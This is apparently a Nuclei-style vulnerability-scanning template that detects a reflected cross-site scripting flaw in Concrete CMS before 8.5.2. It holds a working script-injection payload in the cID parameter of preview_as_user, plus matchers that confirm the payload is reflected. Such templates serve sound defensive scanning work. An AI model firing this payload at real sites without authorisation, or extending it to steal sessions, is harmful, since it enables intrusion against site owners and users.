id: concrete-xss

info:
  name: Concrete CMS <8.5.2 - Cross-Site Scripting
  author: shifacyclewla,hackergautam,djoevanka
  severity: high
  description: Concrete CMS before 8.5.2 contains a cross-site scripting vulnerability in preview_as_user function using cID parameter.
  reference:
    - https://hackerone.com/reports/643442
    - https://github.com/concrete5/concrete5/pull/7999
    - https://twitter.com/JacksonHHax/status/1389222207805661187
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: hackerone,concrete,xss,cms,unauth

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><svg/onload=alert("{{randstr}}")>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</iframe><svg/onload=alert("{{randstr}}")>'

      - type: word
        part: header
        words:
          - "text/html"
          - "CONCRETE5"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/15
